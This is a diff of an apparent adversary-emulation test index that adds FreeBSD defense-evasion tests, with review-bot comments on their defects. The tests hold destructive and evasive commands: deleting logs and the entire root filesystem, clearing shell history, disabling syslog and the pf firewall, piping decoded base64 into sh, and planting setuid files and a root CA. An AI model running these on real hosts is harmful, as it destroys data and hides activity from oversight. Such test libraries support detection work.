@@ -3347,6 +3534,75 @@ defense-evasion: if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi name: sh elevation_required: true + - name: rm -rf + auto_generated_guid: bd8ccc45-d632-481e-b7cf-c467627d68f9 + description: 'Delete messages and security logs + + ' + supported_platforms: + - linux + executor: + command: | + rm -rf /var/log/messages + rm -rf /var/log/security + name: sh + elevation_required: true + - name: Truncate system log files via truncate utility (freebsd) + auto_generated_guid: 14033063-ee04-4eaf-8f5d-ba07ca7a097c + description: 'This test truncates the system log files using the truncate utility + with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying + the file content + + ' + supported_platforms: + - linux + executor: + command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate + --size=0 /var/log/security #size parameter \n" + name: sh + elevation_required: true + - name: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) + auto_generated_guid: 369878c6-fb04-48d6-8fc2-da9d97b3e054 + description: 'The first sub-test truncates the log file to zero bytes via /dev/null + and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, + using cat utility + + ' + supported_platforms: + - linux + executor: + command: | + cat /dev/null > /var/log/messages #truncating the file to zero bytes + cat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros) + name: sh + elevation_required: true + - name: Overwrite FreeBSD system log via echo utility + auto_generated_guid: 11cb8ee1-97fb-4960-8587-69b8388ee9d9 + description: 'This test overwrites the contents of system log file with an empty + string using echo utility + + ' + supported_platforms: + - linux + executor: + command: 'echo '''' > /var/log/messages + + ' + name: sh + elevation_required: true + - name: Delete system log files via unlink utility (freebsd) + auto_generated_guid: 
45ad4abd-19bd-4c5f-a687-41f3eee8d8c2 + description: 'This test deletes the messages log file using unlink utility + + ' + supported_platforms: + - linux + executor: + command: 'unlink /var/log/messages + + ' + name: sh + elevation_required: true - name: Delete system journal logs via rm and journalctl utilities auto_generated_guid: ca50dd85-81ff-48ca-92e1-61f119cb1dcf description: 'The first sub-test deletes the journal files using rm utility @@ -4253,6 +4509,18 @@ defense-evasion: executor: command: 'rm ~/.bash_history + ' + name: sh + - name: Clear sh history (rm) + auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100 + description: 'Clears sh history via rm + + ' + supported_platforms: + - linux + executor: + command: 'rm ~/.sh_history + ' name: sh - name: Clear Bash history (echo) @@ -4265,6 +4533,18 @@ defense-evasion: executor: command: 'echo "" > ~/.bash_history + ' + name: sh + - name: Clear sh history (echo) + auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96 + description: 'Clears sh history via echo + + ' + supported_platforms: + - linux + executor: + command: 'echo "" > ~/.sh_history + ' name: sh - name: Clear Bash history (cat dev/null) @@ -4278,6 +4558,18 @@ defense-evasion: executor: command: 'cat /dev/null > ~/.bash_history + ' + name: sh + - name: Clear sh history (cat dev/null) + auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc + description: 'Clears sh history via cat /dev/null + + ' + supported_platforms: + - linux + executor: + command: 'cat /dev/null > ~/.sh_history + ' name: sh - name: Clear Bash history (ln dev/null) 
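Review bot: In the "Delete log files via cat utility" test the second target is misspelled `/var/lol/messages`, and even with the path fixed `cat /dev/zero > /var/log/messages` has no size bound, so it keeps writing until `/var` is full and only stops when `write()` fails. Bound the overwrite, e.g. `dd if=/dev/zero of=/var/log/messages bs=1k count=1 2>/dev/null`, or drop the `/dev/zero` variant. In the "Truncate system log files" test, `truncate --size=0` is a GNU long option that FreeBSD's `truncate(1)` does not accept as far as I know (only `-s`), so `truncate -s 0 /var/log/security` is the portable form. None of these destructive tests has a `cleanup_command`; recreating the files and running `service syslogd restart` afterwards would give the following tests a live log to act on.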
@@ -4291,6 +4583,18 @@ defense-evasion: executor: command: 'ln -sf /dev/null ~/.bash_history + ' + name: sh + - name: Clear sh history (ln dev/null) + auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd + description: 'Clears sh history via a symlink to /dev/null + + ' + supported_platforms: + - linux + executor: + command: 'ln -sf /dev/null ~/.sh_history + ' name: sh - name: Clear Bash history (truncate) @@ -4303,6 +4607,18 @@ defense-evasion: executor: command: 'truncate -s0 ~/.bash_history + ' + name: sh + - name: Clear sh history (truncate) + auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818 + description: 'Clears sh history via truncate + + ' + supported_platforms: + - linux + executor: + command: 'truncate -s0 ~/.sh_history + ' name: sh - name: Clear history of a bunch of shells @@ -4320,6 +4636,22 @@ defense-evasion: export HISTFILESIZE=0 history -c name: sh + - name: Clear history of a bunch of shells (freebsd) + auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0 + description: 'Clears the history of a bunch of different shell types by setting + the history size to zero + + ' + supported_platforms: + - linux + executor: + command: | + unset HISTFILE + unset histfile + export HISTFILESIZE=0 + export HISTSIZE=0 + history -c + name: sh - name: Clear and Disable Bash History Logging auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 description: 'Clears the history and disable bash history logging of the current 
@@ -4379,6 +4711,33 @@ defense-evasion: ' cleanup_command: 'userdel -f testuser1 + ' + name: sh + - name: Disable sh History Logging with SSH -T (freebsd) + auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee + description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T + keeps the ssh client from catching a proper TTY, which is what usually gets + logged on lastlog + + ' + supported_platforms: + - linux + dependencies: + - description: 'Install sshpass and create user account used for excuting + + ' + prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass + >/dev/null)\n" + get_prereq_command: | + pw useradd testuser1 -g wheel -s /bin/sh + echo 'pwd101!' | pw mod user testuser1 -h 0 + (which pkg && pkg install -y sshpass) + executor: + command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname + + ' + cleanup_command: 'rmuser -y testuser1 + ' name: sh T1202: @@ -4562,7 +4921,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -4600,7 +4958,6 @@ defense-evasion: description: "Use Perl to decode a base64-encoded text string and echo it to the console \n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: 
@@ -4661,6 +5018,80 @@ defense-evasion: echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}" + - name: Base64 decoding with shell utilities (freebsd) + auto_generated_guid: b6097712-c42e-4174-b8f2-4b1e1a5bbb3d + description: 'Use common shell utilities to decode a base64-encoded text string + and echo it to the console + + ' + supported_platforms: + - linux + input_arguments: + message: + description: Message to print to the screen + type: string + default: Hello from Atomic Red Team test T1140! + encoded_file: + description: File to temporarily save encoded text + type: path + default: "/tmp/T1140.encoded" + executor: + name: sh + elevation_required: false + command: | + ENCODED=$(echo '#{message}' | b64encode -r -) + printf $ENCODED | b64decode -r + echo $ENCODED | b64decode -r + echo $(echo $ENCODED) | b64decode -r + echo $ENCODED > #{encoded_file} && b64encode -r #{encoded_file} + echo $ENCODED > #{encoded_file} && b64decode -r < #{encoded_file} + echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r + echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r + - name: FreeBSD b64encode Shebang in CLI + auto_generated_guid: 18ee2002-66e8-4518-87c5-c0ec9c8299ac + description: "Using b64decode shell scripts that have Shebang in them. This + is commonly how attackers obfuscate passing and executing a shell script. + Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) + by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). + Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) + for it. 
\n" + supported_platforms: + - linux + input_arguments: + bash_encoded: + description: Encoded + type: string + default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= + dash_encoded: + description: Encoded + type: string + default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= + fish_encoded: + description: Encoded + type: string + default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= + sh_encoded: + description: Encoded + type: string + default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK + dependencies: + - description: 'b64decode must be present + + ' + prereq_command: 'which b64decode + + ' + get_prereq_command: 'echo "please install b64decode" + + ' + executor: + name: sh + elevation_required: false + command: | + echo #{bash_encoded} | b64decode -r | sh + echo #{dash_encoded} | b64decode -r | sh + echo #{fish_encoded} | b64decode -r | sh + echo #{sh_encoded} | b64decode -r | sh - name: Hex decoding with shell utilities auto_generated_guid: '005943f9-8dd5-4349-8b46-0313c0a9f973' description: 'Use common shell utilities to decode a hex-encoded text string @@ -4668,7 +5099,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5579,7 +6009,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5611,7 +6040,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5646,7 +6074,6 @@ defense-evasion: Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. supported_platforms: - - linux:freebsd - linux - macos input_arguments: 
@@ -5673,7 +6100,6 @@ defense-evasion: This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -6500,6 +6926,34 @@ defense-evasion: cleanup_command: | ufw enable ufw status verbose + - name: Stop/Start Packet Filter + auto_generated_guid: 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7 + description: 'Stop the Packet Filter if installed. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if pfctl is installed on the machine. + + ' + prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n***** + PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\" + ]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n" + get_prereq_command: 'echo "" + + ' + executor: + name: sh + elevation_required: true + command: | + service pf stop + service pf disable + cleanup_command: | + service pf enable + service pf start + service pf status - name: Stop/Start UFW firewall systemctl auto_generated_guid: 9fd99609-1854-4f3c-b47b-97d9a5972bd1 description: "Stop the Uncomplicated Firewall (UFW) if installed, using systemctl. 
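Review bot: "Stop/Start Packet Filter" persists the change with `service pf disable` / `service pf enable`, which depend on the `enable`/`disable` rc subcommands that older FreeBSD releases lack as far as I know; the FreeBSD syslog test in this same diff uses `sysrc syslogd_enable="NO"`, and `sysrc pf_enable=NO` / `sysrc pf_enable=YES` here would be both consistent and portable. The `get_prereq_command` is a bare `echo ""`, so when pf is not loaded the prerequisite can never be satisfied; `kldload pf` would be the meaningful remediation. It is also worth a sentence in the description that stopping pf disables all packet filtering and NAT on the host for the duration of the test.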
@@ -6581,6 +7035,33 @@ defense-evasion: cleanup_command: | { echo y; echo response; } | ufw delete 1 ufw status numbered + - name: Add and delete Packet Filter rules + auto_generated_guid: 8b23cae1-66c1-41c5-b79d-e095b6098b5b + description: "Add and delete a rule on the Packet Filter (PF) if installed and + enabled. \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if pf is installed on the machine and enabled. + + ' + prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n***** + PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\" + ]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n" + get_prereq_command: | + echo "anchor pf-rules >> /etc/pf.conf" + pfctl -f /etc/pf.conf + executor: + name: sh + elevation_required: true + command: | + echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f - + pfctl -a pf-rules -s rules + cleanup_command: | + pfctl -a pf-rules -F rules + sed -i "" '/anchor pf-rules/d' + pfctl -f /etc/pf.conf - name: Edit UFW firewall user.rules file auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. @@ -7620,9 +8101,8 @@ defense-evasion: Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded @@ -7655,9 +8135,8 @@ defense-evasion: Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded 
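Review bot: In "Add and delete Packet Filter rules" the prerequisite `echo "anchor pf-rules >> /etc/pf.conf"` has the redirection inside the quotes, so it only prints the string and never appends the anchor to pf.conf; the rule later loaded with `pfctl -a pf-rules -f -` therefore sits in an anchor the main ruleset never evaluates. The cleanup `sed -i "" '/anchor pf-rules/d'` is missing the file operand and will fail. The lines should be `echo "anchor pf-rules" >> /etc/pf.conf` and `sed -i "" '/anchor pf-rules/d' /etc/pf.conf`, and the prereq_command should also check for the anchor line (`grep -q '^anchor pf-rules' /etc/pf.conf`) so the get_prereq step actually runs when needed.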
@@ -8582,6 +9061,32 @@ defense-evasion: sudo rm /tmp/hello.c name: sh elevation_required: true + - name: Make and modify binary from C source (freebsd) + auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c + description: 'Make, change owner, and change file attributes on a C source code + file + + ' + supported_platforms: + - linux + input_arguments: + payload: + description: hello.c payload + type: path + default: PathToAtomicsFolder/T1548.001/src/hello.c + executor: + command: | + cp #{payload} /tmp/hello.c + chown root /tmp/hello.c + make /tmp/hello + chown root /tmp/hello + chmod u+s /tmp/hello + /tmp/hello + cleanup_command: | + rm /tmp/hello + rm /tmp/hello.c + name: sh + elevation_required: true - name: Set a SetUID flag on file auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in FreeBSD. @@ -8605,6 +9110,28 @@ defense-evasion: ' name: sh elevation_required: true + - name: Set a SetUID flag on file (freebsd) + auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283 + description: 'This test sets the SetUID flag on a file in FreeBSD. + + ' + supported_platforms: + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetUID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + touch #{file_to_setuid} + chown root #{file_to_setuid} + chmod u+xs #{file_to_setuid} + cleanup_command: 'rm #{file_to_setuid} + + ' + name: sh + elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. 
@@ -8628,6 +9155,28 @@ defense-evasion: ' name: sh elevation_required: true + - name: Set a SetGID flag on file (freebsd) + auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d + description: 'This test sets the SetGID flag on a file in FreeBSD. + + ' + supported_platforms: + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetGID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + touch #{file_to_setuid} + chown root #{file_to_setuid} + chmod g+xs #{file_to_setuid} + cleanup_command: 'rm #{file_to_setuid} + + ' + name: sh + elevation_required: true - name: Make and modify capabilities of a binary auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072 description: | @@ -8681,7 +9230,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -4000 @@ -8695,7 +9243,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -2000 @@ -9555,6 +10102,27 @@ defense-evasion: sed -i '$ d' /etc/#{libaudit_config_file_name} name: bash elevation_required: true + - name: Auditing Configuration Changes on FreeBSD Host + auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd + description: 'Emulates modification of auditd configuration files + + ' + supported_platforms: + - linux + input_arguments: + auditd_config_file_name: + description: The name of the auditd configuration file to be changed + type: string + default: audit_event + executor: + command: 'echo ''#art_test_1562_006_1'' >> /etc/security/#{auditd_config_file_name} + + ' + cleanup_command: 'sed -i "" ''/#art_test_1562_006_1/d'' /etc/security/#{auditd_config_file_name} + + ' + name: sh + elevation_required: true - name: Logging Configuration Changes on Linux Host auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. 
@@ -9598,6 +10166,29 @@ defense-evasion: fi name: bash elevation_required: true + - name: Logging Configuration Changes on FreeBSD Host + auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8 + description: 'Emulates modification of syslog configuration. + + ' + supported_platforms: + - linux + input_arguments: + syslog_config_file_name: + description: The name of the syslog configuration file to be changed + type: string + default: syslog.conf + executor: + command: | + if [ -f "/etc/#{syslog_config_file_name}" ]; + then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name} + fi + cleanup_command: | + if [ -f "/etc/#{syslog_config_file_name}" ]; + then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name} + fi + name: sh + elevation_required: true T1562.007: technique: modified: '2023-04-15T00:25:36.502Z' @@ -11401,6 +11992,23 @@ defense-evasion: export HISTCONTROL=ignoreboth #{evil_command} name: sh + - name: Disable history collection (freebsd) + auto_generated_guid: cada55b4-8251-4c60-819e-8ec1b33c9306 + description: 'Disables history collection in shells + + ' + supported_platforms: + - linux + input_arguments: + evil_command: + description: Command to run after shell history collection is disabled + type: string + default: whoami + executor: + command: | + export HISTSIZE=0 + #{evil_command} + name: sh - name: Mac HISTCONTROL auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d description: "The HISTCONTROL variable is set to ignore (not write to the history 
@@ -11481,6 +12089,25 @@ defense-evasion: # -> $HISTFILESIZE is zero cleanup_command: 'export HISTCONTROL=$(echo $TEST) + ' + - name: Setting the HISTSIZE environment variable + auto_generated_guid: 386d3850-2ce7-4508-b56b-c0558922c814 + description: | + An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system. + + Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero. + supported_platforms: + - linux + executor: + name: sh + elevation_required: false + command: | + echo $HISTSIZE + export HISTSIZE=0 + if [ $(echo $HISTSIZE) -eq 0 ]; then echo "\$HISTSIZE is zero"; fi + # -> $HISTSIZE is zero + cleanup_command: 'export HISTSIZE=100 + ' - name: Setting the HISTFILE environment variable auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1 
@@ -11501,6 +12128,25 @@ defense-evasion: # -> $HISTFILE is /dev/null cleanup_command: 'export HISTFILE=$(echo $TEST) + ' + - name: Setting the HISTFILE environment variable (freebsd) + auto_generated_guid: f7308845-6da8-468e-99f2-4271f2f5bb67 + description: | + An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system. + + Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null. + supported_platforms: + - linux + executor: + name: sh + elevation_required: false + command: | + echo $HISTFILE + export HISTFILE="/dev/null" + if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi + # -> $HISTFILE is /dev/null + cleanup_command: 'export HISTFILE=~/.sh_history + ' - name: Setting the HISTIGNORE environment variable auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1 @@ -12614,6 +13260,22 @@ defense-evasion: cleanup_command: "#{cleanup_command}\n" name: sh elevation_required: true + - name: Disable syslog (freebsd) + auto_generated_guid: db9de996-441e-4ae0-947b-61b6871e2fdf + description: 'Disables syslog collection + + ' + supported_platforms: + - linux + executor: + command: | + service syslogd stop + sysrc syslogd_enable="NO" + cleanup_command: | + sysrc syslogd_enable="YES" + service syslogd start + name: sh + elevation_required: true - name: Disable Cb Response auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service @@ -12732,7 +13394,6 @@ defense-evasion: as an additional \npayload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.\n" supported_platforms: - - linux:freebsd - linux executor: command: "swapon -a \nsleep 2\nswapoff -a\nsync\n" 
@@ -13398,6 +14059,37 @@ defense-evasion: /tmp/art.sh cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n" name: sh + - name: Decode base64 Data into Script + auto_generated_guid: 197ed693-08e6-4958-bfd8-5974e291be6c + description: "Creates a base64-encoded data file and decodes it into an executable + shell script\n\nUpon successful execution, sh will execute art.sh, which is + a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand + uname -v\n" + supported_platforms: + - linux + input_arguments: + shell_command: + description: command to encode + type: string + default: echo Hello from the Atomic Red Team && uname -v + dependency_executor_name: sh + dependencies: + - description: 'encode the command into base64 file + + ' + prereq_command: 'exit 1 + + ' + get_prereq_command: 'echo "#{shell_command}" | b64encode -r - > /tmp/encoded.dat + + ' + executor: + command: | + cat /tmp/encoded.dat | b64decode -r > /tmp/art.sh + chmod +x /tmp/art.sh + /tmp/art.sh + cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n" + name: sh T1556.006: technique: modified: '2023-02-09T14:18:59.080Z' @@ -14047,7 +14739,6 @@ defense-evasion: Upon successful execution, sh is renamed to `crond` and executed. supported_platforms: - - linux:freebsd - linux executor: command: | 
@@ -14679,6 +15370,33 @@ defense-evasion: update-ca-trust name: sh elevation_required: true + - name: Install root CA on FreeBSD + auto_generated_guid: f4568003-1438-44ab-a234-b3252ea7e7a3 + description: 'Creates a root CA with openssl + + ' + supported_platforms: + - linux + input_arguments: + cert_filename: + description: Path of the CA certificate we create + type: path + default: rootCA.crt + key_filename: + description: Key we create that is used to create the CA certificate + type: path + default: rootCA.key + executor: + command: | + openssl genrsa -out #{key_filename} 4096 + openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} + cp #{cert_filename} /usr/local/share/certs/ + certctl rehash + cleanup_command: | + rm /usr/local/share/certs/#{cert_filename} + certctl rehash + name: sh + elevation_required: true - name: Install root CA on Debian/Ubuntu auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl @@ -14786,7 +15504,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -14818,7 +15535,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -14849,7 +15565,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -16496,7 +17211,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -16534,7 +17248,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: 
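Review bot: "Install root CA on FreeBSD" generates a 4096-bit CA private key in the working directory and never removes it; since a trusted root's key is exactly what an attacker would want, the cleanup should delete both the key and the local certificate copy, e.g. `rm -f #{key_filename} #{cert_filename}`. Both arguments are typed `path` but the cleanup does `rm /usr/local/share/certs/#{cert_filename}`, which breaks as soon as a caller supplies a directory component; `rm "/usr/local/share/certs/$(basename #{cert_filename})"` handles both cases. A short note in the description that `certctl rehash` rewrites the trust store under /etc/ssl (so detection can key on that) would help practitioners.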
@@ -16590,6 +17303,20 @@ defense-evasion: ' name: bash + - name: Delete Filesystem - FreeBSD + auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608 + description: 'This test deletes the entire root filesystem of a FreeBSD system. + This technique was used by Amnesia IoT malware to avoid analysis. This test + is dangerous and destructive, do NOT use on production equipment. + + ' + supported_platforms: + - linux + executor: + command: | + chflags -R 0 / + rm -rf / > /dev/null 2> /dev/null + name: sh T1158: technique: x_mitre_platforms: @@ -17285,6 +18012,22 @@ defense-evasion: chmod +x 'testdirwithspaceend /init ' './testdirwithspaceend /init ' cleanup_command: rm -rf /tmp/atomic-test-T1036.006 + - name: Space After Filename (FreeBSD) + auto_generated_guid: cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8 + description: 'Space after filename. + + ' + supported_platforms: + - linux + executor: + name: sh + command: "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir + -p 'testdirwithspaceend '\n/bin/echo \"#\\!/bin/sh\" > \"testdirwithspaceend + /init \" && echo 'echo \"print(\\\"running T1035.006 with space after filename + to masquerade init\\\")\" | python3.9' >> \"testdirwithspaceend /init \" + && echo \"exit\" >> \"testdirwithspaceend /init \" \nchmod +x 'testdirwithspaceend + /init '\n'./testdirwithspaceend /init '\n" + cleanup_command: rm -rf /tmp/atomic-test-T1036.006 T1550.002: technique: modified: '2023-03-30T21:01:45.141Z' @@ -17923,7 +18666,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos executor: 
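Review bot: The marker echoed by `Space After Filename (FreeBSD)` says `running T1035.006 with space after filename` while the test is T1036.006 (the directory it creates is `/tmp/atomic-test-T1036.006`); fix the digit in the echoed string. The same script hardcodes `python3.9`, which the test neither checks for nor installs, so on a host with a different Python minor version the masquerading init script fails silently inside the test; either call `python3` or add a dependency check like the `pkg install` prereqs other FreeBSD tests in this change declare. Inside the double-quoted YAML string `\"#\\!/bin/sh\"` the shell receives a literal backslash, so the first line written appears to be `#\!/bin/sh` rather than a valid shebang — confirm on a FreeBSD host.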
@@ -19039,6 +19781,23 @@ defense-evasion: whoami exit cleanup_command: "userdel -r art \n" + - name: Create local account (FreeBSD) + auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 + description: 'An adversary may wish to create an account with admin privileges + to work with. In this test we create a "art" user with the password art, switch + to art, execute whoami, exit and delete the art user. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) + | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" + cleanup_command: 'rmuser -y art + + ' - name: Reactivate a locked/expired account (Linux) auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931 description: "A system administrator may have locked and expired a user account 
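Review bot: In `Create local account (FreeBSD)` the password line targets a user the test never creates: `pw useradd art -g wheel -s /bin/sh` is followed by `pw mod user testuser1 -h 0`, so `pw` fails with an unknown user and `su art` then runs against an account with no password set, contradicting the description (`with the password art`). The same copied line appears in `Reactivate a locked/expired account (FreeBSD)` in the next hunk and in the duplicate entries under privilege-escalation further down. Note also that `openssl passwd -1` emits an already-hashed string while `-h 0` reads a plaintext password from stdin; pw's `-H 0` is the flag for an encrypted value, so the line should read `echo $(openssl passwd -1 art) | pw usermod art -H 0`. Since this index is generated, the correction belongs in the source atomic test YAML.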
@@ -19062,6 +19821,30 @@ defense-evasion: whoami exit cleanup_command: "userdel -r art \n" + - name: Reactivate a locked/expired account (FreeBSD) + auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf' + description: "A system administrator may have locked and expired a user account + rather than deleting it. \"the user is coming back, at some stage\" An adversary + may reactivate a inactive account in an attempt to appear legitimate. \n\nIn + this test we create a \"art\" user with the password art, lock and expire + the account, try to su to art and fail, unlock and renew the account, su successfully, + then delete the account.\n" + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + pw useradd art -g wheel -s /bin/sh + echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0 + pw lock art + pw usermod art -e +1d + pw unlock art + pw user mod art -e +99d + su art + whoami + exit + cleanup_command: "rmuser -y art \n" - name: Login as nobody (Linux) auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85 description: 'An adversary may try to re-purpose a system account to appear 
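Review bot: `pw usermod art -e +1d` sets the expiry one day in the future, so at no point is the account actually expired, and the command block never performs the failing `su` attempt the description promises (`try to su to art and fail`); either move the expiry into the past and add the attempted `su`, or trim the description to what the commands do — confirm the intended behaviour with the test author. The password line `pw mod user testuser1 -h 0` names a user this test never creates, the same defect as in `Create local account (FreeBSD)` above. The block mixes `pw usermod` and `pw user mod`; both spellings are accepted by pw, but one form should be used consistently.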
